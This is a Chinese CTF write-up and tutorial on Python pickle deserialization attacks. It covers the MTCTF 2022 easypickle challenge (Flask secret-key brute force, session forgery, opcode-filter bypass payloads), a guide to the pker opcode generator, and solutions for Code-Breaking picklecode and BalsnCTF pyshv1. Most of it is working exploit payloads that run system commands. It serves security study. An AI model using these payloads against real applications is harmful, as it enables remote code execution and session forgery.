S"2"
db0(S"1"
S"2"
i__main__
Animal
.'''

也就是修改secret中的内容,再修改Animal中的内容

[MTCTF 2022]easypickle

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import base64
import pickle
from flask import Flask, session
import os
import random

app = Flask(__name__)
app.config['SECRET_KEY'] = os.urandom(2).hex()

@app.route('/')
def hello_world():
if not session.get('user'):
session['user'] = ''.join(random.choices("admin", k=5))
return 'Hello {}!'.format(session['user'])


@app.route('/admin')
def admin():
if session.get('user') != "admin":
return f"<script>alert('Access Denied');window.location.href='/'</script>"
else:
try:
a = base64.b64decode(session.get('ser_data')).replace(b"builtin", b"BuIltIn").replace(b"os", b"Os").replace(b"bytes", b"Bytes")
if b'R' in a or b'i' in a or b'o' in a or b'b' in a:
raise pickle.UnpicklingError("R i o b is forbidden")
pickle.loads(base64.b64decode(session.get('ser_data')))
return "ok"
except:
return "error!"


if __name__ == '__main__':
app.run(host='0.0.0.0', port=8888)

爆破出secret-key

1
2
3
4
5
6
7
import os

file_path='./key.txt'
with open(file_path, 'w') as f:
for i in range(1,99999):
key = os.urandom(2).hex()
f.write("\"{}\"\n".format(key))
1
2
3
pip install flask-unsign
flask-unsign --unsign --cookie "eyJ1c2VyIjoiYWRuZGEifQ.ZcCoiA.4j5NXD8o0aO7M1_QlzclCXimORo" --wordlist key.txt
python3 flask_session_cookie_manager3.py encode -s "23a2" -t "{'username':'admin'}"

这里主要看pickle

1
2
3
4
5
6
try:
a = base64.b64decode(session.get('ser_data')).replace(b"builtin", b"BuIltIn").replace(b"os", b"Os").replace(b"bytes", b"Bytes")
if b'R' in a or b'i' in a or b'o' in a or b'b' in a:
raise pickle.UnpicklingError("R i o b is forbidden")
pickle.loads(base64.b64decode(session.get('ser_data')))
return "ok"

算是逻辑漏洞吧

payload

非常巧妙;利用replace(b"os", b"Os")绕过对o操作码的限制;

1
b'''(S'key1'\nS'val1'\ndS'vul'\n(cos\nsystem\nVcalc\nos.'''

但是我感觉预期解的payload应该是下面两这种,利用\81操作码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import pickle
import builtins

opcode=b'''c__builtin__
map
p0
0(S'whoami'
tp1
0(cos
system
g1
tp2
0g0
g2
\x81p3
0c__builtin__
bytes
p4
(g3
t\x81.'''

pickle.loads(opcode)
# p0 __import__("builtins").map
# p1 ('whoami',)
# p2 os.system,('whoami',)
# p3 __import__("builtins").map.__new__(__import__("builtins").map,os.system,('whoami',))
# p4 __import__("builtins").bytes
# . __import__("builtins").bytes.__new__(__import__("builtins").bytes,__import__("builtins").map.__new__(__import__("builtins").map,os.system,('whoami',)))

下面这种paylaod还必须当前文件导入os模块才行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
import pickle
import builtins
import os
opcode = b'''c__builtin__
map
p0
0(S'os.system("whoami")'
tp1
0(c__builtin__
exec
g1
tp2
g0
g2
\x81p3
0c__builtin__
bytes
p4
0(g3
tp3
0g4
g3
\x81.'''

pickle.loads(opcode)
#__import__("builtins").bytes(__import__("builtins").map(__import__("builtins").exec,('os.system("whoami")',)))

pker使用说明

简介

  • pker是由@eddieivan01编写的以仿照Python的形式产生pickle opcode的解析器,可以在https://github.com/eddieivan01/pker下载源码。
  • 使用pker,我们可以更方便地编写pickle opcode(生成pickle版本0的opcode)。
  • 再次建议,在能够手写opcode的情况下使用pker进行辅助编写,不要过分依赖pker。
  • 此外,pker的实现用到了python的ast(抽象语法树)库,抽象语法树也是一个很重要东西,有兴趣的可以研究一下ast库和pker的源码,由于篇幅限制,这里不再叙述。

具体来讲,可以使用pker进行原变量覆盖、函数执行、实例化新的对象。

使用方法与示例

  1. pker中的针对pickle的特殊语法需要重点掌握(后文给出示例)
  2. 此外我们需要注意一点:python中的所有类、模块、包、属性等都是对象,这样便于对各操作进行理解。
  3. pker主要用到GLOBAL、INST、OBJ三种特殊的函数以及一些必要的转换方式,其他的opcode也可以手动使用:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
以下module都可以是包含`.`的子module
调用函数时,注意传入的参数类型要和示例一致
对应的opcode会被生成,但并不与pker代码相互等价

GLOBAL
对应opcode:b'c'
获取module下的一个全局对象(没有import的也可以,比如下面的os):
GLOBAL('os', 'system')
输入:module,instance(callable、module都是instance)

INST
对应opcode:b'i'
建立并入栈一个对象(可以执行一个函数):
INST('os', 'system', 'ls')
输入:module,callable,para

OBJ
对应opcode:b'o'
建立并入栈一个对象(传入的第一个参数为callable,可以执行一个函数)):
OBJ(GLOBAL('os', 'system'), 'ls')
输入:callable,para

xxx(xx,...)
对应opcode:b'R'
使用参数xx调用函数xxx(先将函数入栈,再将参数入栈并调用)

li[0]=321

globals_dic['local_var']='hello'
对应opcode:b's'
更新列表或字典的某项的值

xx.attr=123
对应opcode:b'b'
对xx对象进行属性设置

return
对应opcode:b'0'
出栈(作为pickle.loads函数的返回值):
return xxx # 注意,一次只能返回一个对象或不返回对象(就算用逗号隔开,最后也只返回一个元组)

注意:

  1. 由于opcode本身的功能问题,pker肯定也不支持列表索引、字典索引、点号取对象属性作为左值,需要索引时只能先获取相应的函数(如getattrdict.get)才能进行。但是因为存在sub操作符,作为右值是可以的。即“查值不行,赋值可以”。
  2. pker解析S时,用单引号包裹字符串。所以pker代码中的双引号会被解析为单引号opcode:
1
2
test="123"
return test

被解析为:

1
b"S'123'\np0\n0g0\n."

pker:全局变量覆盖

  • 覆盖直接由执行文件引入的secret模块中的namecategory变量:
1
2
3
4
secret=GLOBAL('__main__', 'secret') 
# python的执行文件被解析为__main__对象,secret在该对象从属下
secret.name='1'
secret.category='2'
  • 覆盖引入模块的变量:
1
2
game = GLOBAL('guess_game', 'game')
game.curr_ticket = '123'

接下来会给出一些具体的基本操作的实例。

pker:函数执行

  • 通过b'R'调用:
1
2
3
4
s='whoami'
system = GLOBAL('os', 'system')
system(s) # `b'R'`调用
return
  • 通过b'i'调用:
1
INST('os', 'system', 'whoami')
  • 通过b'c'b'o'调用:
1
OBJ(GLOBAL('os', 'system'), 'whoami')
  • 多参数调用函数
1
2
INST('[module]', '[callable]'[, par0,par1...])
OBJ(GLOBAL('[module]', '[callable]')[, par0,par1...])

pker:实例化对象

  • 实例化对象是一种特殊的函数执行
1
2
3
4
5
animal = INST('__main__', 'Animal','1','2')
return animal
# 或者
animal = OBJ(GLOBAL('__main__', 'Animal'), '1','2')
return animal
  • 其中,python原文件中包含:
1
2
3
4
class Animal:
def __init__(self, name, category):
self.name = name
self.category = category
  • 也可以先实例化再赋值:
1
2
3
4
animal = INST('__main__', 'Animal')
animal.name='1'
animal.category='2'
return animal

手动辅助

  • 拼接opcode:将第一个pickle流结尾表示结束的.去掉,两者拼接起来即可。
  • 建立普通的类时,可以先pickle.dumps,再拼接至payload。

pker:CTF实战

  • 在实际使用pker时,首先需要有大概的思路,保证能做到手写每一步的opcode,然后使用pker对思路进行实现。

Code-Breaking: picklecode

解析思路见前文手写opcode的CTF实战部分,pker代码为:

1
2
3
4
5
6
7
8
getattr=GLOBAL('builtins','getattr')
dict=GLOBAL('builtins','dict')
dict_get=getattr(dict,'get')
glo_dic=GLOBAL('builtins','globals')()
builtins=dict_get(glo_dic,'builtins')
eval=getattr(builtins,'eval')
eval('print("123")')
return

BalsnCTF:pyshv1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
whitelist = ['sys']
class RestrictedUnpickler(pickle.Unpickler):

def find_class(self, module, name):
if module not in whitelist or '.' in name:
raise KeyError('The pickle is spoilt :(')
return pickle.Unpickler.find_class(self, module, name)


def loads(s):
"""Helper function analogous to pickle.loads()."""
return RestrictedUnpickler(io.BytesIO(s)).load()


dumps = pickle.dumps

题目的find_class只允许sys模块,并且对象名中不能有.号。意图很明显,限制子模块,只允许一级模块。
sys模块有一个字典对象modules,它包含了运行时所有py程序所导入的所有模块,并决定了python引入的模块,如果字典被改变,引入的模块就会改变。modules中还包括了sys本身。我们可以利用自己包含自己这点绕过限制,具体过程为:

  1. 由于sys自身被包含在自身的子类里,我们可以利用这点使用s赋值,向后递进一级,引入sys.modules的子模块:sys.modules['sys']=sys.modules,此时就相当于sys=sys.modules。这样我们就可以利用原sys.modules下的对象了,即sys.modules.xxx
  2. 首先获取modulesget函数,然后类似于上一步,再使用smodules中的sys模块更新为os模块:sys['sys']=sys.get('os')
  3. 使用c获取system,之后就可以执行系统命令了。

整个利用过程还是很巧妙的,pker代码为:

1
2
3
4
5
6
7
8
modules=GLOBAL('sys', 'modules')
modules['sys']=modules
modules_get=GLOBAL('sys', 'get')
os=modules_get('os')
modules['sys']=os
system=GLOBAL('sys', 'system')
system('whoami')
return

更多案例